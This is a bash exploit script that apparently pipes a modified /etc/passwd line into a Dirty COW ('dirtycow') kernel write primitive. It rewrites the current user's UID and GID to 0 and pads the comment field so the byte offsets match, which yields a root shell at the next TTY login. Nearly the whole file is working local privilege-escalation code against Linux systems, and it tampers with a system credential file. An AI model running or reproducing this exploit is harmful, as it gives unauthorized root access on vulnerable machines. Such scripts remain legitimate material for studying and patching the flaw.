#!/bin/bash
#
# Edit /etc/passwd to give $USER root privileges.
#
# This will likely make the X session unstable. By editing the user's UID in
# /etc/passwd, many things that check the user's UID (e.g., sudo) will fail.
# Because of this, the unmodified version of /etc/passwd is backed up to $HOME
# before performing the exploit.
#
# After running this script, switch to a TTY and log in as the current user
# to gain a root shell.

. "$(dirname "$0")/common.sh"

backup="$HOME/passwd"
cp /etc/passwd "$backup"
echoerr "Backed up /etc/passwd to $backup"

offset="$(grep --byte-offset "^$USER" /etc/passwd | cut --delimiter=':' --fields=1)"
awk -v FS=':' -v USER="$USER" '
		BEGIN {
			root_uid = 0;

			# indices of important fields in /etc/passwd
			i_uid = 3;
			i_guid = 4;
			i_comment = 5;
		}

		$0 ~ "^"USER {
			for (i = 1; i <= i_comment; ++i) {
				if (i < i_uid) {
					printf $i;
				} else if (i == i_uid || i == i_guid) {
					padding += length($i) - length(root_uid);
					printf root_uid;
				} else {
					# pad comment to line up with old end of comment
					printf $i;
					while (padding--) printf " ";
				}

				printf FS;
			}
		}' /etc/passwd \
	| dirtycow -o "$offset" /etc/passwd
